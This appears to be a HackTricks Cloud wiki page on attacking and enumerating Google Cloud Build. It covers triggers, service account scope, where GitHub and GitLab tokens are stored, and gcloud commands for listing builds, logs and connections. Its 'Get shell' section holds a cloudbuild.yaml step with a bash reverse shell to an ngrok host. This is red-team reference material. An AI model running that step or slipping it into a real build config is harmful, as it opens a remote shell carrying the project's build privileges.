HackTricks Cloud
HackTricks Cloud
Ask or search…
⌃K
Links

GCP - Cloud Build Enum

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks:

Basic Information

Google Cloud Build is a managed CI/CD platform that automates software build and release processes, integrating with source code repositories and supporting a wide range of programming languages. It allows developers to build, test, and deploy code automatically while providing flexibility to customize build steps and workflows.
Each Cloud Build Trigger is related to a Cloud Repository or directly connected with an external repository (Github, Bitbucket and Gitlab).
I couldn't see any way to steal the Github/Bitbucket token from here or from Cloud Repositories because when the repo is downloaded it's accessed via a https://source.cloud.google.com/ URL and Github is not accessed by the client.

Events

The Cloud Build can be triggered if:
  • Push to a branch: Specify the branch
  • Push a new tag: Specify the tag
  • Pull request: Specify the branch that receives the PR
  • Manual Invocation
  • Pub/Sub message: Specify the topic
  • Webhook event: Will expose a HTTPS URL and the request must be authenticated with a secret

Execution

There are 3 options:
  • A yaml/json specifying the commands to execute. Usually: /cloudbuild.yaml
    • Only one that can be specified “inline” in the web console and in the cli
    • Most common option
    • Relevant for unauthenticated access
  • A Dockerfile to build
  • A Buildpack to build

SA Permissions

The Service Account has the cloud-platform scope, so it can use all the privileges. If no SA is specified (like when doing submit) the default SA <proj-number>@cloudbuild.gserviceaccount.com will be used.
By default no permissions are given but it's fairly easy to give it some:

Approvals

It's possible to config a Cloud Build to require approvals for build executions (disabled by default).

Connections & Repositories

Connections can be created over:
  • GitHub: It will show an OAuth prompt asking for permissions to get a Github token that will be stored inside the Secret Manager.
  • GitHub Enterprise: It will ask to install a GithubApp. An authentication token from your GitHub Enterprise host will be created and stored in this project as a Secret Manager secret.
  • GitLab / Enterprise: You need to provide the API access token and the Read API access token which will stored in the Secret Manager.
Once a connection is generated, you can use it to link repositories that the Github account has access to.
This option is available through the button:
Note that repositories connected with this method are only available in Triggers using 2nd generation.

Connect a Repository

This is not the same as a connection. This allows different ways to get access to a Github or Bitbucket repository but doesn't generate a connection object, but it does generate a repository object (of 1st generation).
This option is available through the button:

Storage

Sometimes Cloud Build will generate a new storage to store the files for the trigger. This happens for example in the example that GCP offers with:
git clone https://github.com/GoogleCloudBuild/cloud-console-sample-build && \
cd cloud-console-sample-build && \
gcloud builds submit --config cloudbuild.yaml --region=global
A Storage bucket called security-devbox_cloudbuild is created to store a .tgz with the files to be used.

Get shell

steps:
- name: bash
script: |
#!/usr/bin/env bash
bash -i >& /dev/tcp/5.tcp.eu.ngrok.io/12395 0>&1
options:
logging: CLOUD_LOGGING_ONLY

Enumeration

You could find sensitive info in build configs and logs.
# Get configured triggers configurations
gcloud builds triggers list # Check for the words github and bitbucket
gcloud builds triggers describe <trigger-name>
​
# Get build executions
gcloud builds list
gcloud builds describe <build-uuid> # Get even the build yaml if defined in there
gcloud builds log <build-uuid> # Get build logs
​
# List all connections of each region
regions=("${(@f)$(gcloud compute regions list --format='value(name)')}")
for region in $regions; do
echo "Listing build connections in region: $region"
connections=("${(@f)$(gcloud builds connections list --region="$region" --format='value(name)')}")
if [[ ${#connections[@]} -eq 0 ]]; then
echo "No connections found in region $region."
else
for connection in $connections; do
echo "Describing connection $connection in region $region"
gcloud builds connections describe "$connection" --region="$region"
echo "-----------------------------------------"
done
fi
echo "========================================="
done
​
# List all worker-pools
regions=("${(@f)$(gcloud compute regions list --format='value(name)')}")
for region in $regions; do
echo "Listing build worker-pools in region: $region"
gcloud builds worker-pools list --region="$region"
echo "-----------------------------------------"
done

Privilege Escalation

Unauthenticated Access

Post Exploitation

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks: